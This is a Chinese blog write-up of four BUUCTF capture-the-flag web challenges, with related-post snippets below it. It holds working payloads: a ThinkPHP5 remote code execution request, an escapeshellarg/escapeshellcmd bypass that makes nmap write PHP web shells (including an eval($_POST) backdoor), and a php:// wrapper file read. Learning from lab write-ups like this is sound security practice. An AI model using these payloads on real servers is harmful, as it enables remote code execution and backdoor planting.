Web-7(25-28)-BUUCTF平台

最新推荐文章于 2023-01-16 17:18:30 发布
最新推荐文章于 2023-01-16 17:18:30 发布
阅读量5k 收藏
点赞数 2
分类专栏: CTF BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/105437591
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
BUUCTF
19 篇文章 1 订阅
订阅专栏

本篇内容
[BJDCTF 2nd]old-hack
[BUUCTF 2018]Online Tool
[0CTF 2016]piapiapia
[ACTF2020 新生赛]Include

上一篇 | 目录 | 下一篇

[BJDCTF 2nd]old-hack
在这里插入图片描述
发现是thinkphp5漏洞,使用Kali查一下漏洞利用方法:
在这里插入图片描述
我们查看一下最新的那个46150.txt,看看是否可以利用,在kali命令行输入:

cat /usr/share/exploitdb/exploits/php/webapps/46150.txt

在这里插入图片描述
尝试一下它给的利用姿势:

?s=captcha

然后POST:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

在这里插入图片描述
发现可行,尝试换成ls /看到flag字眼,然后cat /flag拿到最终flag。
在这里插入图片描述




[BUUCTF 2018]Online Tool

访问网址,直接出现以下代码:

<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);	//创建文件夹
    chdir($sandbox);	//移到该文件夹下
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

大致就是GET一个host参数,经过escapeshellarg()escapeshellcmd()函数处理后,用system命令来执行nmap扫描,扫描host传入的东西。
escapeshellarg()和escapeshellcmd()函数一起使用会导致单引号逃逸,见大佬文章:谈谈escapeshellarg参数绕过和注入的问题。但是常见的命令注入操作如 | & 等不能用,因为escapeshellcmd()函数对一些特殊符号会进行转义。
其实,nmap命令可以将扫描结果写入文件,参数如下表:

-oN				标准保存
-oX				XML保存
-oG				Grep保存
-oA				保存到所有格式
-append-output	补充保存文件

这样,就可以构造payload了,但我都尝试了,发现就一个-oG可用:

' <?php phpinfo();?> -oG shell.php '

经过escapeshellarg()函数处理后就是(这里<?php phpinfo();?>直接执行了,所以不显示)

''\'' -oG shell.php '\'''

经过escapeshellcmd()函数处理后就是

''\\'' \<\?php phpinfo\(\)\;\?\> -oG shell.php '\\'''

然后由于所有的单引号都已经配对,且\<\?php phpinfo\(\)\;\?\>写入shell.php后就又是<?php phpinfo();?>了。

去尝试一下,会生成一个文件夹且会进入该文件夹下:

' <?php phpinfo();?> -oG shell.php '

在这里插入图片描述
在这里插入图片描述
发现可行,那就直接改payload:

' <?php echo `ls /`;?> -oG shell.php '

在这里插入图片描述
在这里插入图片描述
查看flag:

' <?php echo `cat /flag`;?> -oG shell.php '

在这里插入图片描述
在这里插入图片描述

当然的,也可以使用菜刀连接,payload:

' <?php eval($_POST["a"]);?> -oG shell.php '

在这里插入图片描述
然后在根路径下找到flag。
在这里插入图片描述




[0CTF 2016]piapiapia

这题考察反序列化逃逸,说实话有些难度,会照着WP做,但自己的见解不深,直接放大佬博客:[0CTF 2016]piapiapia(反序列化逃逸)




[ACTF2020 新生赛]Include

直接点击tips,出现如下提示:
在这里插入图片描述
试着用php://伪协议做做看,出现了一串base64密文:
在这里插入图片描述
base64解密即可拿到最终flag。
在这里插入图片描述




========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105437591
========================================================

airrudder
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记15】buu [BUUCTF 2018]Online Tool
weixin_43553654的博客
05-15 624
打开一看,发现给了一大串代码,接下来进行审计 if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR']; } //首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用...
escapeshellarg 和 escapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 897
知识点:escapeshellarg 和 escapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)
qq_45521281的博客
05-20 1033
参考: 谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇 谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码: 这里用到escapeshellarg()、escapeshellcmd()两个函数: escapeshellarg: escapeshellarg() 将给字符串增加一
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1592
php命令执行基础与CTF例题分析
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2742
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
buu web:Online Tool(nmap文件写入)
m0_55378150的博客
04-05 539
打开靶场,好家伙,上来就是代码,我喜欢 老规矩,找核心代码 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 这里调用了system函数使用了nmap命令,只有host参数是可控的,并且它是以get方式传入的,我们先测试一下本地ip:?host=127.0.0.1 正常回显,我们往回看看怎么利用 if(!isset($_GET['host'])) { highlight_file(__FILE__); } e
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
spring-web-5.1.5.RELEASE.jar
01-08
spring-web-5.1.5.RELEASE.jar
web-socket-js
12-19
web-socket-js亲测可用
text-generation-webui-main
最新发布
09-20
多种模型后端: transformers、llama.cpp、ExLlama、AutoGPTQ、GPTQ-for-LaMa、ctransformers
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
09-14
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
[Web 安全]命令执行漏洞
weixin_46181386的博客
01-16 213
命令执行漏洞
BUUCTF 2018 Online Tool
qq_50613938的博客
10-25 118
//首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用 ```handlebars if(!isset( $_GET['host'])) {//这里传进来了一个参数 highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); /*一眼就能看出来这里的 $host = escapeshellcmd($host);.
[BUUCTF 2018]Online Tool (escapeshellarg和escapeshellcmd双写利用)
qq_44749590的博客
05-18 464
BUUCTF 2018 Online Tool PHP escapeshellarg()+escapeshellcmd()
『CTF Web复现』[BUUCTF 2018]Online Tool
Ho1aAs‘s Blog
10-24 3791
@[toc] # 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当 # Payload ``` [GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php ' ```
[BUUCTF 2018]Online Tool
shinygod的博客
03-01 1011
知识点:escapeshellcmd escapeshellarg绕过 目录了解解题 了解 php官网 1.escapeshellarg()将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含exec(),system()执行运算符。 2.escapeshellcmd()对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的
buuctf】Online tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3118
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
buuctf(探险2)
qq_62046696的博客
08-08 812
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
1.29刷题
Lumos427的博客
01-29 528
1.[BUUCTF 2018]Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值